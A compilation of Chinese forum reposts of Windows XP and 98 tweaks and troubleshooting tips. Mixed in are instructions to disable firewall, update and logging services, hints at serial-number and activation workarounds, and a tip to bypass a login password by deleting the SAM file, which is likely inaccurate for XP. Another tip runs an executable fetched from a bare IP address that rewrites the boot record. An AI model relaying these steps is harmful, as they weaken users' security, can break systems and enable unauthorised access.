在〔开始〕\〔运行〕\键入〔DVDPlay〕便会出现 Windows Media Player
按播放 VCD 型式操作便可播放 DVD 了，当然你一定要有 DVDRom 装置
如果还出现问题，在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_CURRENT_USER〕
\〔Software〕\〔Microsoft〕\〔MediaPlayer〕\〔Player〕\在〔Settings〕右边窗口
增加一个字符串值〔EnableDVDUI〕数值数据为〔yes〕

关闭自动重新启动功能：

当 Windows XP 遇到严重问题时便会突然重新开机，按下更改可以取消此功能
在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_LOCAL_MACHINE〕\〔SYSTEM〕
\〔CurrentControlSet〕\〔Control〕\〔CrashControl〕\将〔AutoReboot〕dword 值更改为〔0〕重新开机生效

移除共享文档：

除正常〔我的文档〕及〔共享文档夹〕外，每个用户都会有一个独立的活页夹，
如下设定则只会保留我的活页夹，其余的不会显示出来
在〔开始〕\〔运行〕\键入〔regedit〕\选〔HKEY_LOCAL_MACHINE〕\〔SOFTWARE〕
\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔Explorer〕\〔MyComputer〕\〔NameSpace〕\在〔DelegateFolders〕下删除〔{59031a47-3f72-44a7-89c5-5595fe6b30ee}〕机码

取消 IE 自动缩图功能：

Internet Explorer 6 在浏览图片如大出屏幕，图片便会自动缩小如需取消这功能可按如下修改：
在〔开始〕\〔运行〕\键入〔regedit〕\〔HKEY_CURRENT_USER〕\〔Software〕\〔Microsoft〕\〔Internet Explorer〕\在〔Main〕增加一个字符串值〔Enable AutoImageResize〕数据数值为〔NO〕

让 IE6 可以同时下载超过两个档案：
Internet Explorer 6 同时最多只可以下载两个档案，
按下修改可同时下载多达十个档案
在〔开始〕\〔运行〕\键入〔regedit〕\〔HKEY_CURRENT_USER〕\〔\Software〕\〔Microsoft〕\〔Windows〕\〔CurrentVersion〕\〔InternetSettings〕
在右边窗口增加下列两个〔Dword〕值
〔MaxConnectionsPer1_0Server〕数值资料为〔0000000a〕即十进制〔10〕
〔MaxConnectionsPerServer〕数值资料为〔0000000a〕即十进制〔10〕
重新启动计算机生效
[转帖]我的WinXP优化之路［推荐］
转贴］我的WinXP优化之路［推荐］

为了达到这个目的，我们主要从四个方面入手：
1、减少磁盘空间占用
2、终止不常用的系统服务
3、安全问题
4、另外一些技巧
首先问一下，你是不是很想激活XP，不。。。准确的说你是不是想在ms的站上能够升级。如果答案是肯定的话，那我们就先来探讨一下安装的问题，目前流行的V4、V5、V6版本我还是比较推荐的，尤其是V5和V6这两个。安装的过程中有个序列号的问题，我建议你先在机子上算好，然后用这个序列号安装，通常这样安装的XP都可以到MS的站点自由更新。
如果你是已经安装好的XP了，但用的序列号是里到处流传人人都用的那些，也没关系，我们后面会说用sysrep来重新封装的时候会解决序列号更换的问题。

我假设你已经安装完XP了，come on baby ~~

一、瘦身行动

1、在各种软硬件安装妥当之后，其实XP需要更新文件的时候就很少了。删除系统备份文件吧：开始→运行→sfc.exe /purgecache 近3xxM。

2、删除驱动备份： %windows%\driver cache\i386目录下的driver.cab文件，通常这个文件是76M。

3、偶没有看help的习惯，所以保留着%windows%\help目录下的东西对我来说是一种伤害，呵呵。。。都干掉，近4xM。

4、一会在升级完成后你还会发现%windows%\多了许多类似$NtUninstallQ311889$这些目录，都干掉吧，1x-3xM。

5、正好硬盘中还有win2000/server等，所以顺便把pagefile.sys文件都指向一个地方：控制面板→系统→性能-高级→虚拟内存→更改，注意要点“设置”才会生效。

6、卸载不常用组件：用记事本修改\%windows%\inf\sysoc.inf，用查找/替换功能，在查找框中输入,hide，全部替换为空。这样，就把所有的,hide都去掉了，存盘退出后再运行“添加-删除程序”，就会看见“添加/删除 Windows 组件”中多出不少选项；删除掉游戏啊，码表啊等不用的东西。

7、刪除\windows\ime下不用的輸入法，8xM。我重新安装了自己用的zrm输入法，赫赫。

8、如果实在空间紧张，启用NTFS的压缩功能，这样还会少用2x% 的空间，不过我没作。

9、关了系统还原，这破功能对我这样常下载、测试软件的人来说简直是灾难，用鼠标右健单击桌面上的“我的电脑”，选择“属性”，找到“系统还原”，选择“在所有驱动器上关闭系统还原”呵呵，又可以省空间了。

10、还有几个文件，挺大的，也没什么用。。。。忘了名字 ：（ ，刚安装的系统可以用查找功能查找大于50M的文件来看看，应该能找到的。

如果你能按照上面的过程做完，你的原本1.4G的XP，完全可以减少到800以下。

二、加速计划

WinXP的启动会有许多影响速度的功能，尽管ms说已经作最优化处理过，但对我们来说还是有许多可定制之处。我一般是这样来做的。

1、修改注册表的run键，取消那几个不常用的东西，比如Windows Messenger 。启用注册表管理器：开始→运行→Regedit→找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS” /BACKGROUND 这个键值，右键→删除，世界清静多了，顺便把那几个什么cfmon的都干掉吧。

2、修改注册表来减少预读取，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了，开始→运行→regedit启动注册表编辑器，找HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters， 有一个键EnablePrefetcher把它的数值改为“1”就可以了。另外不常更换硬件的朋友可以在系统属性中把总线设备上面的设备类型设置为none（无）。

3、关闭系统属性中的特效，这可是简单有效的提速良方。点击开始→控制面板→系统→高级→性能→设置→在视觉效果中，设置为调整为最佳性能→确定即可。这样桌面就会和win2000很相似的，我还是挺喜欢XP的蓝色窗口，所以在“在窗口和按钮上使用视觉样式”打上勾，这样既能看到漂亮的蓝色界面，又可以加快速度。

4、我用Windows commadner＋Winrar来管理文件，Win XP的ZIP支持对我而言连鸡肋也不如，因为不管我需不需要，开机系统就打开个zip支持，本来就闲少的系统资源又少了一分，点击开始→运行，敲入：“regsvr32 /u zipfldr.dll”双引号中间的，然后回车确认即可，成功的标志是出现个提示窗口，内容大致为：zipfldr.dll中的Dll UnrgisterServer成功。

5、据说XP的一个系统服务Qos，这个调度要占用一定的网络带宽，像我这样的一毛不拔的人是无法忍受的，去掉方法是：开始菜单→运行→键入 gpedit.msc ，出现“组策略”窗口， 展开 "管理模板”→“网络” ， 展开 "QoS 数据包调度程序"， 在右边窗右键单击“限制可保留带宽" ，在属性中的“设置”中有“限制可保留带宽" ，选择“已禁用”，确定即可。当上述修改完成并应用后，用户在网络连接的属性对话框内的一般属性标签栏中如果能够看到"QoS Packet Scheduler（QoS 数据包调度程序）"。说明修改成功，否则说明修改失败，顺便把网络属性中的那个Qos 协议也一起干掉（卸载）吧。

6、快速浏览局域网络的共享
通常情况下，Windows XP在连接其它计算机时，会全面检查对方机子上所有预定的任务，这个检查会让你等上30秒钟或更多时间。去掉的方法是开始→运行→Regedit→在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Explorer\RemoteComputer\NameSpace。在此键值下，会有个{ D6277990-4C6A-11CF-8D87-00AA0060F5BF }键，把它删掉后，重新启动计算机，Windows XP就不再检查预定任务了，hoho~~~ ，速度明显提高啦！

7、关掉调试器Dr. Watson
我好像从win95年代开始一次也没用过这东西，可以这样取消：打开册表，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug子键分支，双击在它下面的Auto键值名称，将其“数值数据”改为0，最后按F5刷新使设置生效，这样就取消它的运行了。沿用这个思路，我们可以把所有具备调试功能的选项取消，比如蓝屏时出现的memory.dmp，在“我的电脑→属性→高级→设置→写入调试信息→选择无”等等。

8、被我终止的服务列表以及相关说明

1)alerter 错误警报
2)automatic updates windows 自动更新
3)background intelligent transfer service 微软说使用空闲的网络带宽传数据
4)clipbook 与远程电脑来共享剪贴板内容，我看还是免了吧
5)Computer browser　说什么要维护网络更新列表
6)DHCP client 我不需要这东西
7)Distributed link tracking client 保持局域网连接更新等信息，偶很少用局域网，这东西占用４M左右内存。
8)Distributed Transaction coordinator 协调xxx，和上面的差不多
9)DNS Client 我不需要这东西
10)Error reporting service 错误报告
11)Event Log 系统日志纪录
12)Fast user switching compatibility 用户切换
13)help and support 帮助
14)Human interface device access 据说是智能设备。。。
15)IMAPI CD-burning COM service　偶不用这个刻碟
16)Indexing service 索引，索引什么呢？
17)Internet Connection Firewall(ICF) ICF防火墙
18)IPSEC Services 这个我不懂，你想知道问Quack去
19)Logical Disk manager administrative service 配置磁盘
20)messenger 好像net send 等东西用的就是这个功能
21)MS software shadow copy provider 卷复制备份的
22)Net Logon 我可不想让黑客远程登录进来，关！
23)Netmeeting remote desktop sharing 我不用netmeeting
24)Network DDE　 动态数据交换传输
25)Network DDE DSDM　和上面差不多
26)Network Location Awareness 关，我的机子不作共享
27)NTLM Security support provider－telnet　呵呵，关！
28)Performance logs and alert 将系统状态写日志或发警告
29)Portable media serial number 关！
30)Print Spooler 打印机，不幸的是我的机子不连接Print ~
31) QoS RSVP 关！
32)Remote desktop help session manager 远程帮助服务
33)remote Procedure Call LOCATOR 管理RPC
34)remote registry 远程管理注册表
35)removable storage
36)routing and remote access 我干脆禁用了它
37)security accounts manager 我的系统只是一个客户系统，不用iis。
38)smart card
39)smart card helper 关！！！
40)SSDP Discovery service 我用不到这个
41)system event notification 如果是服务器肯定要记录的
42)system restore service 系统还原服务
43)task scheduler windows 计划服务
44)Telephony 拨号服务，我不拨号还不行吗？
45)telnet
46)terminal services 终端服务
47)uninterruptible power supply UPS，我没有呀
48)universal plug and play device host 太先进了点，用不到
49)upload manager 关了也能传输文件的
50)volume shadow copy 又是备份，晕
51)webclient 没用过
52)Windows Installer ＭＳＩ服务，我一直关着。
53)windows image acquisition (WIA) 数码设备用的
54)windows management instrumentation driver extensions 关了
55)windows time 时间服务
56)wireless zero configuration 无线网络，偶用不到的
57)WMI perfromance adapter 关！

这里面的一些服务是刚开始就是关的，但我忘了，所以只好把现在系统中关闭的服务基本都列了出来。你根据自己的情况酌情处理吧。

三、我安全吗

多了不谈，基本的共享还是得关的：

修改注册表为以下两个样式：
去除共享
----------------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
----------------------
去除IPC$管理
----------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000001
----------------------
或者将上面两个保存成个.REG文件，然后双击导入就可以了。

顺便把不要脸的的3721也屏蔽，在hosts文件中加入：

127.0.0.1 cnsmin.3721.com
127.0.0.1 http://www.3721.net

四、其他技巧

1、给鼠标右键增加个复制到.../移动到...功能
---------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Copy To]
@="{ C2FBB630-2971-11D1-A18C-00C04FD75D13 }"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shellex\ContextMenuHandlers\Move To]
@="{ C2FBB631-2971-11D1-A18C-00C04FD75D13 }"
------------------------
将上面内容保存成add.reg文件，然后双击导入就可以了。

2、关了错误报告，KAO ！这东西搞得我像个微软免费的测试员似的：点击控制面板---->系统---->高级---->右下角--->错误报告---->禁用错误汇报-->确定！
3、取消分组显示：右键单击任务栏的空白区域，在弹出的菜单中选择“属性”，在弹出的窗口中，取消“分组相似任务栏按钮”前面的对钩，确定就可以了。
4、找回经典的登录窗口，WinXP默认的登录界面虽然漂亮，但如果你想用一个列表中没有的用户登录，你会发现无从下手，改回经典窗口的方法是：点击“开始”→“控制面板”→“用户账户”→“更改用户登录或注销的方式”→把“使用欢迎屏幕”前面的对钩取消，最后点“应用选项”就OK啦。
5、将自己最常用的输入法设置一个快捷键：点击“开始”→“控制面板”→“区域和语言选项”→在弹出的窗口中选择“语言”→“详细信息”→“键设置”在弹出的窗口中找到自己用的输入法，点“更改按键顺序”→在这里选一个快捷键就可以了。
6、关闭计算机时自动结束不响应的任务，注册表：HKEY_CURRENT_USER\Control Panel\Desktop 中的“AugoEndTasks”的键值改为“1”
7、关闭自动更新：右键单击“我的电脑”，点击属性，点击“自动更新”，在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。
8、减少开机磁盘扫描等待时间，开始→运行，键入“chkntfs/t:0”

然后连接到ms站点顺便升级一次就算优化基本完成，对于XP而言，可以采用许多内部命令来看看优化情况，比如tasklist.exe /svc 可以查看系统服务实际使用情况。
优化一个系统，挺麻烦的。所以我们把他保存起来，我们用Ghost生成.GHO文件，这样就可以拿给别人炫耀一下啦，在Ghost之前先要作一个事情，清除系统硬件、注册等信息，否则克隆到不同的机子上将无法启动，在Winxp安装盘上找Deploy.cab 中的sysprep.exe文件。
执行sysprep.exe，选择“重新封装”，下面的标记中可以选择“已提前激活”，还可以选择封装完成后是关机还是重新启动。封装完成后，我们再用带有Ghost的系统盘启动，用Ghost来生成备份.GHO镜像，备份完成！
在执行封装后，重新开机，XP会让我们输入序列号，文中开头所提到的换序列号的办法就是这样换。

Windows XP最新应用技巧大荟萃
                          Windows XP最新应用技巧大荟萃
1.恢复EXE文件关联
    EXE文件关联出错非常的麻烦，
因为这种情况的出现多是由于病毒引起的，而杀毒软件的主文件都是EXE文件，既然EXE文件关联出错，又怎能运行得了杀毒软件呢？还好XP提供了安全模式下的命令行工具供我们使用，可以利用命令行工具来解决这个问题。
    在安全模式下输入：assoc<空格>.exe=exefile<回车>，屏幕上将显示“.exe=exefile”。现在关闭命令提示符窗口，按Ctrl+Alt+Del组合键调出“Windows安全”窗口，按“关机”按钮后选择“重新启动”选项，按正常模式启动Windows后，所有的EXE文件都能正常运行了！
3.更改Windows XP序列号
    在Windows XP安装完毕以后，
可能由于某些原因你又想在已经安装完毕的Windows XP上更改序列号，该怎么办呢？使用激活向导可以满足你的要求。开始之前，强烈建议你在修改之前作一个系统还原点，以免误操作引起不必要的麻烦。

    点击“开始”→“运行”，输入regedit后回车，打开注册表编辑器，定位到HKEY_LOCAL_MACHINE＼Software＼Microsoft＼WindowsNT＼Current Version＼WPAEvents，在右边右键单击OOBETimer，然后选择修改，至少修改一个字节，确定保存。

    点击“开始”→“运行”，输入%systemroot%＼system32＼oobe＼msoobe.exe /a，选择通过电话激活以后点击“下一步”，点击修改序列号，输入新的序列号以后选择“更新”，如果退回到前一个画面，那么选择稍后激活，并重新启动，反复前面的步骤直到修改成功为止，重新激活。点击确定，安装SP1。

    如果你安装SP1以后不能重新启动，那么启动的时候按F8，选择使用“最后一次正确的配置”，然后重复以上流程。本方法适用于Windows XP Professional。

    4.将EFS选项添加至快捷菜单

    Windows XP所配备的加密文件系统(EFS)，可帮助您针对存储在NTFS磁盘卷上的文件和文件夹执行加密操作。如果您已将这个文件加密/解密选项添加至快捷菜单，那么，当用户右键单击某一存储于NTFS磁盘卷上的文件或文件夹时，加密或解密选项便会出现在随后弹出的快捷菜单上。请注意Windows XP Home Edition(家用版)并未提供EFS特性。

    如欲将EFS选项添加至快捷菜单，请依次执行下列操作步骤：在“运行”对话框内输入regedit，展开注册表至下列子键：HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows＼CurrentVersion＼Exporer＼Advanced，在“编辑”菜单上指向“新建”，并单击“DWORD值”，输入EncryptionContextMenu为变量名，并将该变量赋值为1。为确保对注册表进行修改，应在自己的计算机上拥有管理员帐号。

    5.XP选程桌面漏洞解决办法

    Windows XP提供了远程桌面功能，目前被证实存在设计缺陷，可能导致攻击者得到系统远程桌面的账户信息，有助于其进一步攻击。当连接建立的时候，用Windows XP远程桌面把账户名以明文发送给连接它的客户端。发送的账户名不一定是远端主机的用户账号，而是最常被客户端使用的账户名，网络上的嗅探程序可能会捕获到这些账户信息。

    解决方法：到微软主页下载相应的补丁程序，并暂时停止远程桌面的使用，方法是：右键单击“我的电脑”，选择“属性”，在弹出的窗口中，选“远程”标签，勾掉“允许用户远程连接到这台计算机”复选框前的钩，点“确定”即可。

    6.制作密码重设盘

    密码在Windows XP里面是很重要的，但是如果你忘记了没法登陆怎么办？如果你创建了“密码重设盘”，问题就会迎刃而解。在“控制面板”中打开用户帐户，单击您的帐户名，在位于窗口左侧的“相关任务”下面，单击“防止忘记密码”，选择下一步，提示需要一张磁盘，准备一张空白的磁盘插入软驱里面，继续下一步，出现下面输入当前账户的密码以后（图4），按“下一步”即可开始创建，如果你以后忘记了密码，在出现欢迎屏幕时，单击用户名，然后键入密码。如果忘记了密码，则会显示“您是否忘记了自己的密码？”消息，单击“使用密码重设盘”可启动“密码重设向导”，按照“密码重设向导”中的指示，创建新密码，使用新密码登录，然后将密码重设盘收藏到安全地方，以备将来需要重设密码时使用，不必制作新的密码重设盘。

  7.解决因DirectX产生的错误

    如果你在电脑操作中频繁收到DirectDraw错误消息，
则可尝试应用“DirectX诊断工具”解决问题。运行开始菜单中的“附件”→“系统工具”→“系统信息”，在显示的程序界面中，点击菜单栏上的“工具”→“DirectX诊断工具”(图5)，其后，在弹出窗口中切换到“显示”标签页，在此查看“DirectX功能”项目，分别测试当前设备上的DircetDraw及Direct3D，若有问题则禁用此项功能。

  8.使用增加的磁盘工具

    在XP中大家熟悉的ScanDisk没有了，许多人对此很不适应，而且觉得很奇怪，其实，Windows XP中已经包含一个增强了的磁盘工具：Check Disk。因此ScanDisk也没必要存在了。如果想使用Check Disk：打开我的电脑，右键点击一个驱动器，选择“属性”。在“工具”选项卡上，在检查错误下，点击“现在检查”。如果想从命令行检查磁盘分区，可以用chkdsk c:这样的格式。

    9.忘记登陆口令的解决办法

    XP对用户安全性的审核即是非常严格的，要是你忘记了设置的口令，可别以为能够像Windows98那样选择“取消”就可以进入系统，这一点相信安装过Windows XP的朋友是很清楚的。由于没有登陆口令，无法进入系统，许多朋友无奈之下选择了重新安装Windows XP的办法，但这种方法既繁琐又费时费力，其实不必那么麻烦的。

    大家知道，Windows 2000/XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager,SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删除。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识都时完全不同的。因此，一旦某个帐号被删除，它的安全标识就不再存在了，即使用相同的用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。

    安全账号管理器的具体表现就是%SystemRoot%＼system32＼config＼sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名及口令等相关信息都会保存在这个文件中。知道了这些我们的解决办法也产生了：在系统启动前，插入启动盘，进入C:＼WINNT＼System3＼Config＼，用ren命令将SAM文件改名，或用del命令将SAM文件删除，重启电脑即可。改名或删除SAM文件以后，试用Administrator登录，密码为空，成功了。

    10.字体安装的优化

    有些朋友需要安装各种不同的字体，但是有些字体本身很大，特别是中文字体，一般在10M左右，一旦安装过多的字体，会使系统盘臃肿不堪，其实，从Win98到WinXP，都可以在安装的时候做一点优化，效果就是不再把新字体拷贝到系统盘。

    以WinXP为例，我们在一个空白的驱动器上建立一个目录：NewFonts(名字、驱动器名字任意定)，然后把全部需要安装的字体放到这个目录里面，然后在“开始”→“运行”里面输入fonts，打开字体目录，依次打开“文件”→“安装新字体”，在出现的对话框里面找到D:＼NewFonts这个目录，然后去掉“将字体复制到Fonts文件夹”前面的“√”(图6)，最后选中要安装的字体，确定即可。

11.声音提示切换键

    在你在进行大量英文/汉字输入的过程中，
大概经常会遇到误按切换键而导致输入频繁出错，从而降低工作效率的情况(特别是快速盲打)。如果我们为切换键设置了声音提示，就可有效地避免这一问题。在“控制面板”中，双击“辅助功能选项”图标，在弹出对话框中查看"键盘"标签页，在此勾选“切换键”项目中的“使用切换键”复选框，最后点击“确定”使设置升效(图7)。

  12.时间校正自动化

    要是Win XP系统下的时钟突然不准了怎么办？相信大多数人都会选用手工方式来重新将时间校准；可惜，无论我们怎么细心，用手工方式总是无法实现精确校时的。要想精确对时钟进行校时的话，我们可以利用下面的方法来实现：

    直接用鼠标双击系统任务栏托盘区中的系统时钟图标，打开“Internet时间”标签页面，在其中选择一台标准的时间服务器，单击确定按钮后，系统自动连接到因特网上，并自动比较计算机内的系统时钟与指定服务器的时钟，要是发现不准确的话就可以自动调整了。不过要想调整精确的话，必须确保自己的系统没有安装防火墙。

    13.XP也可磁盘扫描

    不知何数，在Windows XP之中没有为我们提供磁盘扫描的功能，这给我们对磁盘整理带来了一些不便。为了解决这个，经过潜心研究终于找出了解决方法。

    在“我的电脑”中右击想进行扫描检测的分区，打开其属性对话框，然后切换到“工具”标签，在“查错”区域点击“开始检查”按钮，在随后打开的对话框中选中“自动修复文件系统错误”、“扫描并试图恢复坏扇区”两个选项(图8)，然后点击“开始”按钮即可。

  14.禁止使用IE6下载文件

    有些时候我们需要禁止IE下载文件功能，但是一直苦于没有办法使用系统的设置，其实如果在注册表中稍作修改的话就可以满足大家的要求了。打开注册表编辑器，找到HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Internet Settings＼Zones＼3，然后在右边找到1803这个Dword值，双击修改为3即可。重新启动IE看看还能不能够下载的？如果要取消限制的话，只需要还原Dword值为0即可。

    15.利用光盘检测系统兼容性

    Windows XP作为目前个人安装使用的最新操作系统，在一些老爷机上经常会碰到安装过程出现不兼容的情况，使得安装过程到了一半就被迫结束。为了避免这种情况的发生，我们可以在安装Windows XP之前，借助其安装光盘来对系统的兼容性进行一些检测。

    将安装光盘放入光驱，一般都会自动打开欢迎使用界面(注：如果禁止光盘自动运行，我们可以执行光盘中的SETUP.EXE命令，同样可以打开)点击其界面上的最后一项“检查系统兼容性”然后点击“自动检查我的系统”，这样待上一会就会显示检查结果，汇报不兼容的项目，要想安装使用Windows XP就得先解决好这些不兼容的项目才行，免得中途被迫停止。

16.给Windows XP找回纯DOS

    有时我们不得不使用一些在纯DOS模式下工作的程序，但是在Windows XP中已经找不到纯DOS了，难道我们非得放弃这些在纯DOS下运行的程序吗？当然不是！利用下面的办法就可以让你在Windows XP中进入纯DOS模式。

    第一种方法：利用Win98

    在我们安装XP操作系统前，先用Windows 98启动盘启动系统，并通过sys c:命令向c盘传送系统。并将常用的DOS命令拷贝到硬盘中，然后按常规方法安装XP，当安装成功后，在启动菜单的默认菜单"Microsoft Windows XP"下会新增一个“Microsoft Windows”菜单项，选中此菜单项后，由于系统中没有安装Windows98系统，所以此时计算机就会自动转到DOS系统下，而且还是实模式的，这样就达到了我们的目的。

    第二种方法：采用start命令

    在Windows XP的命令解释符中输入：start/seperate要运行的程序，即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序，而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按Alt+Enter键在全屏幕与窗口之间进行切换。

    第三种方法：利用工具软件

    我们还可以使用一个小工具pqvf.exe来达到目的，该软件下载的地址是61.234.226.248/pqvf.exe。该软件是部分网友分析了PQ Magic的相关文件，并提取了部分文件制作的软件，可以让那些Windows XP用户迅速引导到纯DOS下，重新启动后又可以正常使用Windows XP启动。

    下载后的pqvf.exe文件是一个自解压程序，解压后的文件名字和作用如下：MBR.dat和restrmbr.exe这两个文件的主要作用是用来恢复硬盘的主引导记录的，作用与执行FDISK/mbr命令一样，可以清除主引导扇区而不改变分区表结构。Vfinst9x.exe用于在Windows 9x下启动纯DOS界面，VfinstNT.exe用于在Windows XP下启动纯DOS界面。pqvf.vfd中则包含有启动的软磁盘映像文件。

    具体方法是：直接运行VfinstNT.exe,vfinstNT.exe文件，它们会修改硬盘主引导记录，然后Windows XP会自动重新启动，重启动后你看到的盘符将是A:。敲入ver命令可以查看当前的DOS版本，显示的是“Windows 98(version 4.10.2222)”，看来已是纯DOS了！而且像himem.sys.emm386.exe、光驱驱动和鼠标驱动程序这样的必备驱动也安装了，并且还自动装上一个简单的汉字系统，完全可以应付一般的DOS应用了。如果想回到Windows XP界面，只要重新启动计算机就可以了。

在Windows XP中对文件进行加密
    在Windows XP中确实可以直接对文件(夹)进行加密，但是，这需要一个前提：要加密的文件(夹)所在的硬盘分区是NFTS格式的。如果你的硬盘分区不是NFTS格式，请进行操作转换后，再按下面的方法进行加密。

    选中需要加密的文件(夹)，右击鼠标键，在随后弹出的快捷菜单中，选“属性”选项，在“常规”标签中，按“高级”按钮打开“高级属性”对话框，选中其中的“加密内容以便保护数据”选项后，确定退出即可。

    特别需要提醒的是：如果用上述方法对文件(夹)进行了加密，以后重新安装系统之前，最好对它进行解密(解密与加密方法相似)操作，否则系统重装后，可能造成文件(夹)不能正常打开。

在Windows XP中运行DOS程序
    问：近日我将系统升级为Windows XP，但是我的一些旧的排版软件需要在DOS下运行，而Windows XP中已经没有纯DOS了，请问应该怎么运行DOS程序呢？

    答：可以采用start命令来运行。在Windows XP的命令提示符中输入：start/seperate要运行的程序，即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序，而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按“Alt+Enter”键在全屏幕与窗口之间进行切换。


[系统]电脑应用常见问题集中贴

《一键清理系统垃圾》

[系统]电脑应用常见问题集中贴

                  重装系统失败的原因多种多样，下面我们就对可能导致重装系统失败的原因做一剖析：

                      1、版本报错

                      问：我的机器不能启动，试图进行覆盖安装，但安装程序检测Windows版本时提示出错，不能更新或升级安装，我该怎么办？

                      答：在安装完系统之后，原有系统的win.com文件记录着Windows的版本信息，这时如果我们用非相同版本进行覆盖安装，就会出现版本报错问题，使覆盖安装受阻。这时我们不妨用Windows
                  98启动盘启动电脑，进入Windows将win.com文件删除或更名，然后在DOS下启动安装程序进行覆盖安装，这时安装程序认为是全新安装，覆盖安装即可顺利进行。

                      2、启用了防毒功能

                      问：当覆盖安装系统时，屏幕上突然显示“Boot sector write!! VIRUS
                  continue(Y/N)?”提示错误，导致覆盖安装失败，这是什么提示，如何解决？

                      答：其实，这并非故障，而是因为原来系统中的某些应用程序，如系统恢复工具或杀病毒软件、系统防火墙的保护功能所致。具体地说，我们在BIOS中打开了防病毒功能，或是有的杀毒软件在安装时智能化的打开BIOS中的防病毒功能，由于Windows安装时会向硬盘的主引导区写入数据，打开防病毒功能后会导致硬盘的主引导区无法写入任何数据，安装程序当然就无法继续运行。出现此类错误时，应该到原来的操作系统中将这些软件通过“开始”--“设置”--“控制面板”--“添加/删除程序”进行卸载，或进入BIOS将防病毒功能暂时关闭。然后再对系统覆盖或升级。

                      问：本人覆盖安装系统从未失败过，可我帮助同事进行覆盖安装系统时，屏幕出现SU-0011错误信息，使安装无法继续下去，真让我丢了面子，请问这是什么问题？

                      答：这显然是原有系统对硬盘设置了进入口令，使得安装程序不能完成安装。这样只好先删除口令设置，待安装完Windows
                  98后，再设置硬盘的口令。

                      4、重名目录

                      问：在安装Windows
                  98的过程中，出现SU0167的错误信息，使安装搁浅，怎么也进行不下去，请问这是什么问题，如何解决？

                      答：错误信息提示是重名目录造成的。因为当前目录中存在名为“Desktop”的目录，而在Windows
                  98安装过程中将生成一个名为“Desktop”的目录存放系统文件，因此安装程序不能将Windows
                  98安装在这个目录中。解决的办法很简单，只要将当前目录中的“Desktop”目录删除或重新命名，然后再运行安装程序即可成功。

                      5、磁盘空间“不足”

                      问：自己在安装Windows
                  98的时候系统提示磁盘空间不够，安装无法进行。但查看磁盘空间，发现实际上磁盘空间是够的，我该怎么办？

                      答：在Windows
                  98系统安装时有一个磁盘空间检查的环节，如果你的磁盘存在碎片过多等问题就会出现“磁盘空间不足”的提示。没关系，请在执行Setup.exe命令时加上“/id”参数，也就是输入“Setup/id”命令，这样可以使安装程序忽略检查可用磁盘空间的步骤，从而使安装成功。

                      问：我的电脑在安装Windows
                  98时，执行到系统配置一步时出现问题，尝试几次都不成功，非常苦恼，能告知什么原因和解决办法吗？

                      答：安装系统时，系统自动关机或没有响应，也有的会提示“致命的异常错误发生在0137”或“0028错误”。出现这种情况一般都是由于硬件问题造成的。而其中主要原因是芯片过热导致。解决的方法可采取：恢复CPU超频设置；检查CPU散热风扇是否脱落或停转；显示卡的主芯片散热风扇是否脱落或停转；内存条或硬盘是否存在故障；机箱内散热状况是否良好等等，然后根据检查或判断的结果相应采取对策。

                      7、扩展内存出错

                      问：安装Windows 98时出现提示“Standard Mode:Fault in MS-DOS
                  Extender”，致使系统不能继续安装。请问这是什么意思，如何应对？

                      答：这个提示的意思是：标准模式下，MS-DOS扩展内存出错。解决的办法可以用启动盘进入DOS，在C盘下用Edit命令打开Config.sys文件，在该文件的“EMM386”语句前面键入“REM”使该语句无效，重新引导系统往往即可进入安装程序。

                    8、硬件检测停滞

                      问：在安装Windows 98时，安装程序在进行硬件检测时停止了。为什么？怎么办？

                      答：这是硬件错误造成的。建议关闭机器，停止10秒钟以上，然后重新开机。当电脑启动后，重新运行安装程序。由于程序已经安装完，选择“使用安全恢复”选项，这样在硬件检测时将跳过引起错误的部分。如果系统再次停止，重新执行上述步骤直至跳过错误部分，使硬件检测执行结束。

                  Windows XP任务栏问题

                  症状一：控制音量的小喇叭图标不见了，音量无法方便调节

                      打开“控制面板”，选择“声音、语言和音频设备→声音和音频设备”，然后再打开窗口的“音量”选项，勾选“将音量图标放入任务栏”选项，确定后音量图标便会出现。

                      症状二：输入法选项不见了，而且不容易激活

                      在任务栏空白处单击右键。在出现菜单中的“工具栏”选项中单击“语言栏”选项后，桌面即会出现语言任务条。对于激活问题，可通过鼠标右键单击语言任务条，选择“设置”，在“键设置”中选择适合的组合键，即可方便激活。

                      症状三：任务栏假死

                      在使用Windows XP过程中，时不时会出现任务栏一动不动，而桌面等其他部分却可正常使用的问题，这是Windows
